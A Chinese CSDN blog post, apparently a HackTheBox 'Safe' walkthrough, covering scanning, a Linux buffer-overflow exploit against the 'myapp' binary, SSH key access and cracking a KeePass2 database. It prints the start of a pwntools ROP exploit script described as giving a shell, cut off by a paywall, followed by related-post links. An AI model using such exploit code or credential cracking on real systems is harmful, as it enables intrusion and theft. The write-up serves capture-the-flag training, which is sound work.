hackthebox-safe(考点:新建ssh连接& keepass2)

最新推荐文章于 2024-07-15 18:13:46 发布
最新推荐文章于 2024-07-15 18:13:46 发布
阅读量662 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105982678
版权
本文介绍了在HackTheBox的Safe挑战中,如何通过扫描22和80端口,尝试SSH连接,下载并利用Linux BOF漏洞,新建SSH key连接,解密KeePass2数据库,最终进行提权获取root权限的过程。
摘要由CSDN通过智能技术生成

扫描

常规22和80端口。22想到ssh登录,80进去web搜集信息
没发现什么,web页面 ctrl+u 看前端源码发现 隐藏说可以下myapp

在这里插入图片描述

超纲的bof

下载

10.10.10.147/myapp

这明显是linux缓冲区溢出,但是难度远超oscp的,所以针对oscp备考者,不必要把时间浪费在这。而且考试似乎只考win的bof。如果你学有余力,倒可以多研究研究。

这段脚本可直接拿去用,直接拿shell。 但是前提要安装pwn库。专门的ctf库。可以参考这个,但过程可能因每人电脑里python安装情况等不同而各种报错。或许很难安装上。我也是搞了很久才莫名其妙的发现可以用了。。。

#!/usr/bin/env python


from pwn import *

context(os="linux", arch="amd64")
#context(log_level='DEBUG')

junk = "A"*120

got_puts = p64(0x404018)
plt_system = p64(0x401040)
pop_rdi  = p64(0x40120b)
main     = p64
最低0.47元/天 解锁文章
冬萍子
关注
KeePass Password Safe 2
09-14
ctf中不太常用的一个工具 但有的题会用到 KeePass Password Safe是一款优秀的密码管理工具,实际上可能还不仅仅是密码管理工具,重要的文件也可以保存在这款软件中
grotesque_vh-1.0.1 vulnhub靶场通关 (keepass2john)
weixin_62621015的博客
03-24 377
grotesque_vh-1.0.1 vulnhub靶场通关 (keepass2john)
关于KeePass导致微软拼音输入法ChsIME.exe和CTF加载程序cpu占用高的问题
最新发布
qq_42215139的博客
07-15 418
原因是KeePass输入密码时的安全窗口跟微软的输入法冲突了,根据作者建议,修改配置,去掉输入密码时弹出安全窗口。1、搜索找到有个老哥发现是KeePass(密码管理)软件导致的。2、然后找到作者的提供的解决方案。
开膛手约翰(john)的初学者指南(第2部分)
大方子
03-03 9459
在本文中,我们将使用John the Ripper破解某些文件格式(如zip,rar,pdf等)的密码哈希值。 为了破解这些密码哈希,我们将使用一些内置的和一些其他实用程序从锁定文件中提取密码哈希。有些实用程序内置了john,可以使用以下命令找到它们。 找到* 2john 如您所见,我们有以下实用程序,我们将在此处演示其中一些实用程序。 破解SSH密码哈希 John the Ripper...
内存取证系列2
SwBack的博客
11-07 1167
内存取证,volatility练习,职业技能大赛
No.170-HackTheBox-Linux-Safe-Walkthrough渗透学习
qq_34801745的博客
07-21 320
** HackTheBox-Linux-Safe-Walkthrough ** ¬ 靶机地址:https://www.hackthebox.eu/home/machines/profile/199 靶机难度:初级(2.7/10) 靶机发布日期:2019年10月25日 靶机描述: Safe is an Easy difficulty Linux VM with a vulnerable service running on a port. The binary is found to be vulnerabl
KeePass-Yet-Another-Favicon-Downloader:KeePass 2.x的另一个Favicon下载器
05-01
还有一个Favicon Downloader (简称YAFD )是KeePass 2.x的插件,可让您快速下载用于图标输入密码的favicon 。 特征 并发和响应(允许更快的下载而不会冻结用户界面) 轻巧可靠(旨在批量下载数千个图标) 聪明...
google-drive-sync:KeePass Password Safe v2插件,用于将密码同步到Google云端硬盘文件
03-20
Beta版现已发布!如果您当前安装了Alpha版本,则应。 如果您当前使用Google Sync Plugin 3.0的...该资源中的字符串是机器翻译的-如果您能够并且愿意翻译西班牙语或任何其他KeePass支持的语言,请与我们联系或提交PR。
KeePassWinHello:使用Windows Hello for KeePass 2快速解锁
05-01
使用Windows Hello for KeePass 2快速解锁 这个密码管理器插件旨在在使用首次解锁后使用PIN或生物特征识别快速授权到数据库。 用法 使用此插件,您可以: 使用您的masterkey / keyfile /其他提供者解锁数据库; ...
Keepass-Self-Bruteforce:使用Python脚本使KeePass对其自身执行Self-Bruteforce攻击
05-26
Keepass-自助暴力使KeePass对其自身执行Self-Bruteforce攻击的Python脚本。 有关更多信息,请访问Q-Protex的网站或Q-Protex的博客。
keepass2-haveibeenpwned:我是否已为KeePass进行检查而变得简单
05-28
keepass2-haveibeenpwned KeePass 2.x插件可针对各种违规列表检查所有带有URL的条目。 从下载plgx。 Mono用户可以从下载dll。 Mono用户可能会发现他们需要安装等效于mono-complete的发行版才能使插件正常工作。 ...
KeeAgent:KeePass 2.x的ssh代理插件
05-10
KeeAgent是KeePass 2.x的插件。 它允许其他程序访问存储在KeePass数据库中的SSH密钥以进行身份​​验证。 它既可以充当独立代理,也可以与外部代理进行交互。 下载 通过获取KeeAgent 用法 文档位于 骇客 拉请求是欢迎的! 有关更多信息,请参见 。 版权 (C)2012-2020大卫·(David Lechner)
对DriftingBlues-5靶机进行渗透测试
zll___的博客
04-20 906
对DriftingBlues-5靶机进行渗透测试
Grotesque系列Grotesque1靶机渗透
m0_74950307的博客
12-26 87
keepass2john 是 John the Ripper(一种密码破解工具)中的一个插件,用于将 KeePass 数据库文件转换为 John the Ripper 可识别的格式。这些文件通常受到密码保护,并使用强大的加密算法进行加密,以确保数据的机密性和安全性。看到密码,和用户:raphael 密码: _double_trouble_看了别人的资料,他们的左上角写着密码需要大写,额为撒我的没有?看到root的密码:.:.subjective.:.所以就看了资料,接出来的密码是:chatter。
[Vulnhub靶机] DriftingBlues: 5
haosha。的博客
02-13 1993
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
Hackthebox------Jerry
大方子
11-24 3061
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
KeePass密码信息明文传输漏洞复现(CVE-2023-24055)
huayimy的博客
04-04 1004
KeePass密码信息明文传输漏洞复现(CVE-2023-24055),必坑复现,保姆式复现过程
hackthebox-Tracks-CREST_CRT-Squashed
lalalaze的博客
02-15 244
打靶
HTB在内核实现
关注云计算,与中国云计算共成长
11-25 2864
Linux内核中流量控制(11) 本文档的Copyleft归yfydz所有,使用GPL发布,可以自由拷贝,转载,转载时请保持文档的完整性, 严禁用于任何商业用途。 msn: yfydz_no1@hotmail.com 来源:http://yfydz.cublog.cn Java代码   5.11 HTB(Hierarchical token bu
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值